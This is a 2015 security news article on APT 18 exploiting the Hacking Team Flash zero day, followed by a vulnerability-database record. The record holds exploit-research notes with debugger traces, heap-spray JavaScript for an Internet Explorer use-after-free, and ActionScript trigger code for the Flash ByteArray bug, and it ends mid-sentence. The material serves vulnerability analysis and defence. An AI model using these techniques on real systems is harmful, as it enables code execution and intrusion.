According to Virginia-based security company Volexity, spear phishing messages purporting to be from Adobe have been found spreading a modified version of the Hacking Team exploit that affects Flash Player versions up to 18.0.0.194. Labels found in the code, in fact, refer to Hacking Team, the company said.
Internal emails, sales invoices and other documents leaked since the breach was made public implicate Hacking Team in selling exploits and intrusion software to oppressive governments and sanctioned countries.
The spear phishing message found by Volexity urges the victim to download and install an updated version of Flash and includes a link to http://get[.]adobe[.]com that instead redirects the recipient to a site hosted by PEG TECH Inc. The site loads a malicious .swf file exploiting the Flash vulnerability patched yesterday by Adobe.
The malware executes and connects to a known Webky command and control address hosted in Singapore, Volexity said.
“Any connection involving this IP address or these hostnames should be consider hostile and a likely indicator of compromise,” the company said in its report.
In the past, the Webky APT group, also known as APT 18, has hosted other malware families from the Singapore IP address, including Poison Ivy and the Gh0st remote access Trojan in this case.
Volexity said that current, patched versions of Flash will display a pop-up dialog with the word “faile!” prominently displayed.
“It looks like the attackers may have left a debug message from their testing,” Volexity said. “Not very subtle at all.
“The attackers are having a field day with this exploit and will not slow down any time soon,” the company said. “Patching is the most prudent course of action to deal with this exploit that is very much in the wild.”
Adobe yesterday patched the zero day in Flash Player, CVE-2015-5119, one of 36 vulnerabilities patched in the update. The Hacking Team bug was the only one being publicly exploited. The update patched a mix of vulnerability classes, including memory address randomization issues, heap buffer overflows, memory corruption bugs, security bypass vulnerabilities, same-origin bypasses, and use-after-free flaws.
The Flash zero day, it was revealed yesterday as well, was quickly integrated into the major exploit kits, including Angler, Nuclear and Neutrino, as well as the Metasploit Framework.
Security company Bromium, published its analysis of the zero day, determining it was a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322) which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.
Meanwhile, yesterday, Department of Homeland Security’s CERT at the Software Engineering Institute at Carnegie Mellon University released an advisory warning users about a still unpatched Windows kernel vulnerability that was also part of the Hacking Team data dump.
“A memory-corruption flaw in Adobe Type Manager allows for manipulation of Windows kernel memory, which can result in a wide range of impacts,” said the CERT advisory. In this case, a successful exploit such as Hacking Team’s could allow an attacker to bypass browser and operating system sandbox protection to obtain System privileges on a Windows computer.
“We have confirmed that the exploit code successfully obtains SYSTEM privileges on Windows XP through Windows 8.1 systems, both 32-bit and 64-bit,” CERT said.
{"id": "THREATPOST:10AFDF2569BF60140B11198E0B2082D8", "type": "threatpost", "bulletinFamily": "info", "title": "Wekby APT 18 Exploiting Hacking Team Flash Zero Day", "description": "The Wekby APT group, implicated in a number of [targeted attacks against health care organizations such as Community Health Systems](<https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828>) and major pharmaceutical companies, is reportedly making use of the Adobe Flash Player zero-day found in the [Hacking Team data dump](<https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612>).\n\nAccording to Virginia-based security company Volexity, spear phishing messages purporting to be from Adobe have been found spreading a modified version of the Hacking Team exploit that affects Flash Player versions up to 18.0.0.194. Labels found in the code, in fact, refer to Hacking Team, the company said.\n\nInternal emails, sales invoices and other documents leaked since the breach was made public implicate Hacking Team in selling exploits and intrusion software to [oppressive governments and sanctioned countries](<https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638>).\n\nThe spear phishing message found by Volexity urges the victim to download and install an updated version of Flash and includes a link to http://get[.]adobe[.]com that instead redirects the recipient to a site hosted by PEG TECH Inc. The site loads a malicious .swf file exploiting the Flash vulnerability patched yesterday by Adobe.\n\nThe malware executes and connects to a known Webky command and control address hosted in Singapore, Volexity said.\n\n\u201cAny connection involving this IP address or these hostnames should be consider hostile and a likely indicator of compromise,\u201d the company said in its [report](<http://www.volexity.com/blog/?p=158>).\n\nIn the past, the Webky APT group, also known as APT 18, has hosted other malware families from the Singapore IP address, including Poison Ivy and the Gh0st remote access Trojan in this case.\n\nVolexity said that current, patched versions of Flash will display a pop-up dialog with the word \u201cfaile!\u201d prominently displayed.\n\n\u201cIt looks like the attackers may have left a debug message from their testing,\u201d Volexity said. \u201cNot very subtle at all.\n\n\u201cThe attackers are having a field day with this exploit and will not slow down any time soon,\u201d the company said. \u201cPatching is the most prudent course of action to deal with this exploit that is very much in the wild.\u201d\n\nAdobe yesterday [patched the zero day in Flash Player](<https://helpx.adobe.com/security/products/flash-player/apsb15-16.html>), CVE-2015-5119, one of 36 vulnerabilities patched in the update. The Hacking Team bug was the only one being publicly exploited. The update patched a mix of vulnerability classes, including memory address randomization issues, heap buffer overflows, memory corruption bugs, security bypass vulnerabilities, same-origin bypasses, and use-after-free flaws.\n\nThe Flash zero day, it was revealed yesterday as well, was quickly [integrated into the major exploit kits](<https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663>), including Angler, Nuclear and Neutrino, as well as the Metasploit Framework.\n\nSecurity company Bromium, published its [analysis](<http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/>) of the zero day, determining it was a byte array use-after-free memory issue that allows an attacker to gain control of a Windows machine running the vulnerable Flash Player. Researcher Nick Cano wrote that Hacking Team built its proof-of-concept code based on a 2014 vulnerability known as the ActionScript-Spray attack (CVE-2014-0322) which took advantage of a UAF bug in Internet Explorer to gain access to the heap of a process.\n\nMeanwhile, yesterday, Department of Homeland Security\u2019s CERT at the Software Engineering Institute at Carnegie Mellon University released an [advisory](<http://www.kb.cert.org/vuls/id/103336>) warning users about a still unpatched Windows kernel vulnerability that was also part of the Hacking Team data dump.\n\nThe flaw lives specifically in the [Adobe Type Manager kernel module in Windows](<https://threatpost.com/details-available-on-patched-adobe-windows-font-vulnerabilities/113454>); the module provides support for OpenType fonts.\n\n\u201cA memory-corruption flaw in Adobe Type Manager allows for manipulation of Windows kernel memory, which can result in a wide range of impacts,\u201d said the CERT advisory. In this case, a successful exploit such as Hacking Team\u2019s could allow an attacker to bypass browser and operating system sandbox protection to obtain System privileges on a Windows computer.\n\n\u201cWe have confirmed that the exploit code successfully obtains SYSTEM privileges on Windows XP through Windows 8.1 systems, both 32-bit and 64-bit,\u201d CERT said.\n", "published": "2015-07-09T14:50:54", "modified": "2015-07-13T18:36:39", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://threatpost.com/apt-group-exploiting-hacking-team-flash-zero-day/113715/", "reporter": "Michael Mimoso", "references": ["https://threatpost.com/apt-gang-branches-out-to-medical-espionage-in-community-health-breach/107828", "https://threatpost.com/hackers-release-hacking-team-internal-documents-after-breach/113612", "https://threatpost.com/eu-lawmaker-wants-answers-on-hacking-team-sales-to-sanctioned-countries/113638", "http://www.volexity.com/blog/?p=158", "https://helpx.adobe.com/security/products/flash-player/apsb15-16.html", "https://threatpost.com/hacking-team-flash-zero-day-weaponized-in-exploit-kits/113663", "http://labs.bromium.com/2015/07/07/adobe-flash-zero-day-vulnerability-exposed-to-public/", "http://www.kb.cert.org/vuls/id/103336", "https://threatpost.com/details-available-on-patched-adobe-windows-font-vulnerabilities/113454"], "cvelist": ["CVE-2014-0322", "CVE-2015-5119"], "lastseen": "2018-10-06T22:56:36", "viewCount": 9, "enchantments": {"score": {"value": 9.5, "vector": "NONE", "modified": "2018-10-06T22:56:36", "rev": 2}, "dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:BDC2BC7E-5904-4C44-80ED-E26E3BD1A1A6", "AKB:47269E9B-0CEB-46D4-BD88-640970C28E72", "AKB:2A826956-B7BF-4556-BC5F-09013506A0D1"]}, {"type": "cve", "idList": ["CVE-2014-0322", "CVE-2015-5119"]}, {"type": "thn", "idList": ["THN:81AF218D527E626B7FE15454B68E5FF0", "THN:94A6EEF7B58D5DE9CCE68307A6FA2B6F", "THN:F6B79957FA6EFD8F9C60F4A8646CCE04"]}, {"type": "seebug", "idList": ["SSV:61771", "SSV:61751", "SSV:61756", "SSV:86119", "SSV:61755", "SSV:86169", "SSV:61754", "SSV:61753", "SSV:61455"]}, {"type": "symantec", "idList": ["SMNTC-75568", "SMNTC-65551"]}, {"type": "threatpost", "idList": ["THREATPOST:342B067585A04A2E2EA010EA2C33DC1B", "THREATPOST:8E1ED1F0B1BE2AA1090A58DDA736DF92", "THREATPOST:9E1DE5C0DB7F1D8747AD52E14E4C8387", "THREATPOST:EBDCB2D4445A9B7E6AD0B43B5AE5928B", "THREATPOST:944377914FB1A58CB3F9F096F78260E0", "THREATPOST:30E23091BD920CFE6F579C918001D85D", "THREATPOST:C548E20E88796567652367831D8DDE51", "THREATPOST:CD8D5C4911EF94191B3B8464E2C6174B", "THREATPOST:A72A91268C8C0871DE1E44E25B215AAF", "THREATPOST:B3C0097CBA4C334709D99BB9D477A6DD", "THREATPOST:36DC9B1F1EFE6F30B37A56180A6A6163", "THREATPOST:644EA98A53DF0E53AF5BDAC1607B06D2", "THREATPOST:521E37B95AC41E0A1D35ADB09B1A4835", "THREATPOST:3B1AC0DCF443FE114390008118EF2808"]}, {"type": "saint", "idList": ["SAINT:D8D6BCBC7A7819EE47BC5E6D40059708", "SAINT:4AA18219F0F43605A5B96CC5B2DF62FF", "SAINT:6D3D943FE6C76C9CA78A9454A6931B44"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:126150", "PACKETSTORM:132600", "PACKETSTORM:126178"]}, {"type": "cert", "idList": ["VU:732479", "VU:561288"]}, {"type": "nessus", "idList": ["GENTOO_GLSA-201507-13.NASL", "OPENSUSE-2015-473.NASL", "FLASH_PLAYER_APSB15-16.NASL", "SUSE_SU-2015-1214-1.NASL", "GOOGLE_CHROME_43_0_2357_132.NASL", "SMB_KB2934088.NASL", "ADOBE_AIR_APSB15-16.NASL", "FREEBSD_PKG_348BFA6925A211E5ADE10011D823EEBD.NASL", "SMB_NT_MS14-012.NASL", "SMB_KB3065823.NASL"]}, {"type": "zdt", "idList": ["1337DAY-ID-23842", "1337DAY-ID-22151", "1337DAY-ID-22145"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:36F8E5756845AFEDB523188019517EAE"]}, {"type": "canvas", "idList": ["IE_CMARKUP", "ADOBE_FLASH_VALUEOF"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MS14_012_CMARKUP_UAF", "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_HACKING_TEAM_UAF"]}, {"type": "exploitdb", "idList": ["EDB-ID:32851", "EDB-ID:37523", "EDB-ID:32904"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2015:1207-1", "OPENSUSE-SU-2015:1210-1", "SUSE-SU-2015:1214-1", "SUSE-SU-2015:1211-1"]}, {"type": "freebsd", "idList": ["348BFA69-25A2-11E5-ADE1-0011D823EEBD"]}, {"type": "securelist", "idList": ["SECURELIST:DA2F9F352C039B19A1FF5741AA1AA7C4", "SECURELIST:56D279C45B0C4431FBA76FDF2EC365A1", "SECURELIST:75F0B75D28318C525992E42495D8C5EE"]}, {"type": "cisa", "idList": ["CISA:2A8422190E3030D1FA551BC2C97714D9"]}, {"type": "archlinux", "idList": ["ASA-201507-7"]}, {"type": "fireeye", "idList": ["FIREEYE:C106464BCA41AB0D5AF6965D9907C8C3", "FIREEYE:7D8237F41EA87865A58B16DF63389DAA", "FIREEYE:C1FB4B9FAC84D1B9FD74A7D5A588D1D2"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:FD11436A13A56E314FE7438DEDAF9FBA"]}, {"type": "mssecure", "idList": ["MSSECURE:A133B2DDF50F8BE904591C1BB592991A"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310130105", "OPENVAS:1361412562310805912", "OPENVAS:1361412562310850845", "OPENVAS:1361412562310805903", "OPENVAS:1361412562310805911", "OPENVAS:1361412562310805904", "OPENVAS:1361412562310121394", "OPENVAS:1361412562310805902", "OPENVAS:1361412562310804500"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14591", "SECURITYVULNS:VULN:13605"]}, {"type": "mskb", "idList": ["KB2925418"]}, {"type": "redhat", "idList": ["RHSA-2015:1214"]}, {"type": "gentoo", "idList": ["GLSA-201507-13"]}, {"type": "kaspersky", "idList": ["KLA10623"]}, {"type": "myhack58", "idList": ["MYHACK58:62201994516"]}], "modified": "2018-10-06T22:56:36", "rev": 2}, "vulnersScore": 9.5}, "immutableFields": []}
{"attackerkb": [{"lastseen": "2021-05-06T15:18:00", "bulletinFamily": "info", "cvelist": ["CVE-2015-5119"], "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 23, 2020 6:06pm UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2019-10-30T00:00:00", "id": "AKB:47269E9B-0CEB-46D4-BD88-640970C28E72", "href": "https://attackerkb.com/topics/eDqrGGkKhD/cve-2015-5119", "published": "2019-10-30T00:00:00", "type": "attackerkb", "title": "CVE-2015-5119", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-06T15:21:28", "bulletinFamily": "info", "cvelist": ["CVE-2012-0003", "CVE-2014-0322"], "description": "Use-after-free vulnerability in Microsoft Internet Explorer 9 and 10 allows remote attackers to execute arbitrary code via vectors involving crafted JavaScript code, CMarkup, and the onpropertychange attribute of a script element, as exploited in the wild in January and February 2014.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n\u2014\n\nThe crash / corruptions happens at CMarkup::UpdateMarkupContentsVersion:\n \n \n .text:637C9454 inc dword ptr [eax+10h]\n \n\nIn order to return from CMarkup::UpdateMarkupContentsVersion we can use the next route:\n \n \n .text:637C9454 inc dword ptr [eax+10h] ; Corruption!\n .text:637C9457\n .text:637C9457 loc_637C9457: ; CODE XREF: CMarkup::UpdateMarkupContentsVersion(void)+14j\n .text:637C9457 mov ecx, [edx+94h] ; we need to bypass this part, we control edx, so not a big deal\n .text:637C945D xor eax, eax\n .text:637C945F test ecx, ecx\n .text:637C9461 jz short loc_637C9466\n .text:637C9463 mov eax, [ecx+0Ch]\n .text:637C9466\n .text:637C9466 loc_637C9466: ; CODE XREF: CMarkup::UpdateMarkupContentsVersion(void)+23j\n .text:637C9466 cmp dword ptr [eax+1C0h], 0 ; We must make eax+1c0h == 0 (not a big deal via spray)\n .text:637C946D jz short locret_637C9496 ; So this jz is taken and we return from CMarkup::UpdateMarkupContentsVersion\n \n\n * After returning from CMarkup::UpdateMarkupContentsVersion we land into CMarkup::NotifyElementEnterTree: \n\n \n \n .text:63776EC8 call ?UpdateMarkupContentsVersion@CMarkup@@QAEXXZ ; it's the call we're using for corruption\n .text:63776ECD mov eax, [esi+98h] ; esi is the controlled object\n .text:63776ED3 test eax, eax\n .text:63776ED5 jz short loc_63776EED\n .text:63776ED7 cmp dword ptr [esi+1A4h], 15F90h\n .text:63776EE1 jl short loc_63776EED\n .text:63776EE3 mov eax, [eax+8]\n .text:63776EE6 and dword ptr [eax+2F0h], 0FFFFFFBFh ; We need to bypass this and, after that we get the control back :)\n \n\nReused object:\n \n \n 0:008> dd 061b90c8 Ld0\n 061b90c8 deadc0de 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b90d8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b90e8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b90f8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9108 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9118 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9128 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9138 1a1b1ff0 1a1b1ff0 1a1b1ff1 9a1b1ff1\n 061b9148 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9158 1a1b1ff0 1a1b2004 1a1b200c 1a1b1ff0\n 061b9168 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9178 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9188 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9198 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b91a8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b91b8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b91c8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b91d8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b91e8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b91f8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9208 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9218 1a1b1ff0 1a1b1ff0 1a1b1ff0 42424242\n 061b9228 1a1b1ff4 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9238 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9248 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9258 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9268 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9278 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9288 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9298 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b92a8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b92b8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b92c8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b92d8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b92e8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b92f8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9308 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9318 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9328 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9338 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9348 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9358 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9368 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9378 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9388 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b9398 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b93a8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b93b8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b93c8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b93d8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b93e8 1a1b1ff0 1a1b1ff0 1a1b1ff0 1a1b1ff0\n 061b93f8 1a1b1ff0 1a1b1ff0 1a1b1ff0 00001ff0\n \n\nSprayed memory should look like:\n \n \n 0:008> dd eax+10\n 1a1b2000 00000001 1a1b203c 00000000 1a1b2098\n 1a1b2010 1a1b2064 1a1b2068 00000000 00000000\n 1a1b2020 00000000 00000000 00000000 00000000\n 1a1b2030 00000000 00000000 00000000 00000000\n 1a1b2040 00000000 00000000 00000000 00000000\n 1a1b2050 00000000 00000000 00000000 00000000\n 1a1b2060 00000000 00000000 00000000 00000000\n 1a1b2070 00000000 00000000 00000000 00000000\n \n x=1a1b1ff0 ebx=0298eeb8 ecx=00000195 edx=061b90c8 esi=061b90c8 edi=0297d568\n eip=67ed9457 esp=02efb54c ebp=02efb5b8 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\n MSHTML!CMarkup::UpdateMarkupContentsVersion+0x19:\n 67ed9457 8b8a94000000 mov ecx,dword ptr [edx+94h] ds:0023:061b915c=04201b1a\n 0:008> dd edx + 94\n 061b915c 1a1b2004\n \n 0:008> t\n eax=00000000 ebx=0298eeb8 ecx=1a1b2004 edx=061b90c8 esi=061b90c8 edi=0297d568\n eip=67ed9463 esp=02efb54c ebp=02efb5b8 iopl=0 nv up ei pl nz na po nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202\n MSHTML!CMarkup::UpdateMarkupContentsVersion+0x25:\n 67ed9463 8b410c mov eax,dword ptr [ecx+0Ch] ds:0023:1a1b2010=64201b1a\n 0:008> dd ecx + 0c\n 1a1b2010 1a1b2064 1a1b2068 00000000 00000000\n \n 1a1b2064 must point to sprayed memory with content \"0\"\n \n 0:008> t\n eax=1a1b2064 ebx=0298eeb8 ecx=1a1b2004 edx=061b90c8 esi=061b90c8 edi=0297d568\n eip=67e86ecd esp=02efb550 ebp=02efb5b8 iopl=0 nv up ei pl zr na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246\n MSHTML!CMarkup::NotifyElementEnterTree+0x277:\n 67e86ecd 8b8698000000 mov eax,dword ptr [esi+98h] ds:0023:061b9160=0c201b1a\n 0:008> dd esi + 98\n 061b9160 1a1b200c\n \n 0:008> dd 1a1b200c\n 1a1b200c 1a1b2098 1a1b2064 1a1b2068 00000000\n 1a1b201c 00000000 00000000 00000000 00000000\n 1a1b202c 00000000 00000000 00000000 00000000\n 1a1b203c 00000000 00000000 00000000 00000000\n 1a1b204c 00000000 00000000 00000000 00000000\n 1a1b205c 00000000 00000000 00000000 00000000\n 1a1b206c 00000000 00000000 00000000 00000000\n 1a1b207c 00000000 00000000 00000000 00000000\n \n 0:008> t\n eax=1a1b200c ebx=0298eeb8 ecx=1a1b2004 edx=061b90c8 esi=061b90c8 edi=0297d568\n eip=67e86ee3 esp=02efb550 ebp=02efb5b8 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206\n MSHTML!CMarkup::NotifyElementEnterTree+0x28d:\n 67e86ee3 8b4008 mov eax,dword ptr [eax+8] ds:0023:1a1b2014=68201b1a\n 0:008> dd eax+8\n 1a1b2014 1a1b2068\n \n\nSimulate an spray with:\n \n \n .dvalloc /b 1a1b1ff0 4000\n \n\nTHen go to 1a1b2004 and write:\n \n \n 1a1b203c 00000000 1a1b2098 1a1b2064 1a1b2068\n \n\nAfter several tries I keep crashing curiously again:\n \n \n 0:008> r\n eax=00000000 ebx=02f0c028 ecx=1a1b1ff0 edx=04e68ad8 esi=04e68ad8 edi=02f02b00\n eip=67ed9466 esp=036bb46c ebp=036bb4d8 iopl=0 nv up ei pl nz na pe nc\n cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\n MSHTML!CMarkup::UpdateMarkupContentsVersion+0x28:\n 67ed9466 83b8c001000000 cmp dword ptr [eax+1C0h],0 ds:0023:000001c0=????????\n 0:008> dd ecx+c\n 1a1b1ffc 00000000 00000003 1a1b203c 00000000\n 1a1b200c 1a1b2098 1a1b2064 1a1b2068 00000000\n \n\nSo we\u2019re going to try adding to 1a1b1ffc => 1a1b205c => It adds some reliability, \nbut finally crashes again, looks like because finally we don\u2019t control the reused \nmemory, someone else won the race :?\n \n \n .dvalloc /b 1a1b1ff0 4000\n f 1a1b1ffc L1C 5C 20 1B 1A 00 00 00 00 3C 20 1B 1A 00 00 00 00 98 20 1B 1A 64 20 1B 1A 68 20 1B 1A\n \n\n# Heap Spray with Attributes\n\nIn order to use the technique by vupen disclosed here:\n\n<http://www.vupen.com/blog/20120117.Advanced_Exploitation_of_Windows_MS12-004_CVE-2012-0003.php>\n\nthe cloneNode doesn\u2019t work anymore:\n \n \n \tvar cl0ne = test.cloneNode(true);\n \n\nIt won\u2019t clone attribute values, so CAttrValue::Copy isn\u2019t hit anymore. In order to solve, after checking \nthe xrefx to CattrValue::Copy there is an interesting new path:\n \n \n CElement::mergeAttributes\n \n Here is PoC:\n \n function test() {\n \tvar myDiv = document.getElementById(\"pwn\")\n \tvar test = document.createElement(\"select\")\n \ttest.setAttribute('obj0', \"AAAAAAAAAAAAAAAAAAAA\")\n \ttest.setAttribute('obj1', new Date())\n \ttest.setAttribute('obj2', new Date())\n \ttest.setAttribute('obj3', \"METASPLOIT\")\n \talert(test.attributes.length);\n \talert(test.getAttribute('obj0'));\n \tvar cl0ne = test.cloneNode(true);\n \tcl0ne.mergeAttributes(test);\n }\n \n\nSpraying with Attributes, definite version:\n \n \n <html>\n <head>\n \n <script>\n function myTest() {\n \n \tvar test = document.createElement(\"select\")\n \tfor (var j = 0; j < 0x80; j++) {\n \t\ttest.setAttribute('test' + j, unescape(\"%u0001\"))\n \t}\n \n \tvar empty = document.createElement(\"select\")\n \n \talert('oka, bp copy......')\n \tvar myAttributes = new Array();\n \tfor (var i = 0; i < 0x20; i++) {\n \t\tmyAttributes[i] = empty.cloneNode(true);\n \t\tmyAttributes[i].mergeAttributes(test);\n \t}\n \n \n \talert('oka, check what is there in memory...')\n \talert(myAttributes[0].getAttribute('test0').length);\n \n \t//alert(myAttributes[0].test0.length);\n \t//alert(cl0ne.attributes.length);\n }\n </script>\n </head>\n <body onload=\"myTest();\">\n </body>\n </html>\n \n\nIt will spray 0x800 size structs (with the Variant types and the pointers to strings!)\n", "modified": "2020-02-13T00:00:00", "id": "AKB:2A826956-B7BF-4556-BC5F-09013506A0D1", "href": "https://attackerkb.com/topics/4zowfplDhQ/microsoft-internet-explorer-use-after-free-vulnerability", "published": "2014-02-14T00:00:00", "type": "attackerkb", "title": "Microsoft Internet Explorer Use-After-Free Vulnerability", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-05-06T15:21:26", "bulletinFamily": "info", "cvelist": ["CVE-2010-2161", "CVE-2015-5119"], "description": "Use-after-free vulnerability in the ByteArray class in the ActionScript 3 (AS3) implementation in Adobe Flash Player 13.x through 13.0.0.296 and 14.x through 18.0.0.194 on Windows and OS X and 11.x through 11.2.202.468 on Linux allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted Flash content that overrides a valueOf function, as exploited in the wild in July 2015.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n<http://en.wikipedia.org/wiki/Adobe_Flash_Player>\n\nCongrats! You are reading about the most beautiful Flash bug for the last four \nyears since CVE-2010-2161.\n\nThe use-after-free vulnerability exists inside the built-in ByteArray class \n<http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/utils/ByteArray.html>\n\nLet\u2019s create a simple ByteArray object:\n \n \n var ba:ByteArray = new ByteArray();\n ba.length = 8;\n ba[1] = 1;\n \n\nNow we can access ba[] items and write numeric byte values into ba[]. \nAlso we are allowed to write objects into ByteArray. For example:\n \n \n var obj = new MyClass();\n ba[0] = obj;\n \n\nAS3 will try to implicitly convert the MyClass object into numeric value by \ncalling the MyClass.valueOf() method. This method can be easily redefined \nwithin the user\u2019s code:\n \n \n class MyClass\n {\n prototype.valueOf = function()\n {\n ba.length = 88; // reallocate ba[] storage\n return 0; // return byte for ba[offset]\n }\n }\n \n\nLet\u2019s see how that implicit conversion occurs inside the native code:\n \n \n push esi\n mov eax, [esp+8] // the offset value from \"ba[offset] = obj\"\n push eax\n add ecx, 0x18 // ecx = this = \"ba\" object pointer\n call ByteArray.getStorage() // gets ba[offset] storage pointer and\n mov esi, eax // saves it in esi\n \n mov ecx, [esp+0xC] // \"obj\" pointer\n push ecx\n call AvmCore.toInteger() // call MyClass.valueOf()\n add esp,4\n mov [esi], al // writes returned byte into array\n \n pop esi\n ret 8\n \n\nOn high-level language this will look like:\n \n \n void ByteArray.setObjInternal(int offset, obj)\n {\n byte* dest = this.getStorage(offset);\n dest* = toInteger(obj);\n }\n \n\nSo the array storage pointer is saved in local variable, then AS3 valueOf() is \ninvoked from the native code and returned byte is written into destination \npointer at the end. If valueOf() changes the length of byte array (see above) \nand reallocates its internal storage, then local destination pointer becomes \nobsolete and further usage of that pointer can lead to UaF memory corruption.\n\nUsing this vulnerability, it\u2019s very easy to control what byte will be written \nand at which offset this corruption will occur.\n\n 1. AFFECTED SOFTWARE \nAdobe Flash Player 9 and higher\n\n 2. TESTING \nOpen the test \u201ccalc.htm\u201d file in your browser and press the button.\n\non Windows: \nCalc.exe should be 